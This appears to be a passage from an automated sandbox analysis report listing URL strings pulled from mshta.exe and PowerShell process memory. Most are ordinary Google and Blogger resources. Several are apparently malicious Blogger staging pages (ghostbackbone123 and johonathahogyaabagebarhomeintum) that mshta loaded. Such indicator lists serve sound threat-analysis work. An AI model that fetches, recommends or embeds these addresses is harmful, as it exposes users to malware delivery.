Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-te
Source: mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.597026970.00000215A89CC000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.529475810.0000009CCDBFB000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-tech
Source: mshta.exe, 00000006.00000003.276779788.000000000A3AF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.276988976.000000000A39A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.277065858.000000000A36B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601173634.00000215A8B34000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/static-on-bigtable
Source: powershell.exe, 00000016.00000002.505010455.000001ACC4FE9000.00000004.00000001.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/?usp=docs_alcSyH
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/?usp=docs_alcnal
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/forms/?usp=forms_alc
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=slides_alc7vD
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=slides_alcMX
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=sheets_alc
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?tab=jo
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?tab=joj
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://duo.google.com/?usp=duo_ald
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://earth.google.com/web/
Source: mshta.exe, 00000006.00000003.401937493.000000000A345000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.google.com/license/googlerestricted
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/
Source: mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
Source: mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://fonts.googleapis.com/ss?family=Open
Source: mshta.exe, 00000006.00000002.432405705.000000000A382000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/(Q
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/BX
Source: mshta.exe, 00000006.00000002.432405705.000000000A382000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/N
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/fX/EsQ
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/materialiconsextended/v109/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eot
Source: mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/materialiconsextended/v109/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eotC
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.579246594.00000215A6245000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot
Source: mshta.exe, 00000006.00000003.277027798.000000000A3AC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot);
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot2
Source: mshta.exe, 0000001B.00000002.579246594.00000215A6245000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389513364.000001BEEAD69000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotC:
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotI
Source: mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eoter-AgentMozilla/4.0
Source: mshta.exe, 00000006.00000002.431162379.000000000A337000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotghLMEM
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotgspot.com/p/ayoolaback.html
Source: mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://fonts.gstatic.com/s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eotss
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot
Source: mshta.exe, 00000006.00000003.401937493.000000000A345000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.383803015.000000000A2FF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);ica
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot);ry)
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eot;
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eotR
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/productsans/v13/pxiDypQkot1TnFhsFMOfGShVF9eK.eotp
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.432534150.000000000A38D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.401937493.000000000A345000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot);
Source: mshta.exe, 00000006.00000002.433415047.000000000A45B000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot)ShVF9eK
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot)ShVF9eK.eot)ejYY-oE_LvN.eot))K8A4qdA
Source: mshta.exe, 00000006.00000003.285035686.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot29;
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eotC:
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eotLMEM
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eotN
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eotPBUV
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eotola.htmlztrMu7
Source: mshta.exe, 00000006.00000002.431702263.000000000A356000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eotttC:
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspom/
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com//p/ghostba
Source: mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com//p/ghostbackup15.html%22
Source: mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com//p/ghostbackup15.html%22))
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com//p/ghostbackup15.html%220px
Source: mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/;$awK
Source: mshta.exe, 00000021.00000002.540398831.00000214F005F000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/V
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/favicon.ico
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/feeds/posts/default3s
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/feeds/posts/defaultX
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/feeds/posts/defaultche
Source: mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/js/cookienotice.js3r
Source: mshta.exe, 00000021.00000002.555056773.0000021CF22D2000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/js/cookienotice.jsCr
Source: mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/js/cookienotice.jslogID=1690726786805467605&zx=1fe0aef2-8b4f-4
Source: mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/operties
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22--
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22.
Source: mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22...
Source: mshta.exe, 00000021.00000002.534478877.00000214EFF94000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22.IE55.html%22ence
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22/res
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%221f1))T
Source: mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22714
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22?interstitial=ABqL8_jkcLSQu4puOkm2aUhYN
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22R
Source: mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22S
Source: mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Z
Source: mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22a
Source: mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22bone123.blogspot.com/p/ghostbackup15.ht
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22bs-i
Source: mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22ckup15.html%22
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22eader
Source: mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22https://www.blogger.com/static/v1/jsbin
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22idth
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22ion:
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22k
Source: mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22nts_light.pngight.png
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22olid
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22px;
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22resour
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22rial
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22s:
Source: mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22w
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22z
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog
Source: mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog7
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blogC
Source: mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blogD
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/se
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://ghostbackbone123.blogspot.com/search
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.491682345.0000000005521000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester8
Source: powershell.exe, 00000009.00000003.383618370.0000000005E0D000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://hangouts.google.com/
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://hangouts.google.com/x.png
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://i18n-cloud.appspot.co
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://jamboard.google.com/?usp=jam_ald
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://jamboard.google.com/?usp=jam_ald8
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://jamboard.google.com/?usp=jam_aldF
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspo
Source: mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.334926065.000000000A32E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.282553280.00000000068DB000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.314926949.0000000006788000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/f
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.334926065.000000000A32E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.282553280.00000000068DB000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/favicon.ico
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.396240494.00000000068E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.383723109.000000000A33B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.364198176.000000000AEC0000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.334926065.000000000A32E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.433415047.000000000A45B000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.334926065.000000000A32E000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000006.00000002.429665706.00000000068D5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426851753.000000000678F000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/feeds/posts/defaultays%2C%20mualollfl%0A%27Task
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/js/cookienotice.js$
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/js/cookienotice.js7pa
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/js/cookienotice.jsit
Source: mshta.exe, 00000006.00000003.309020572.00000000067A3000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/js/cookienotice.jsse.js683ea
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/js/cookienotice.jsu
Source: mshta.exe, 00000006.00000003.282553280.00000000068DB000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
Source: mshta.exe, 00000006.00000003.272307045.00000000067F5000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html9
Source: mshta.exe, 00000006.00000002.431702263.000000000A356000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html?interstitial=ABqL8_iE16PINy
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlJ
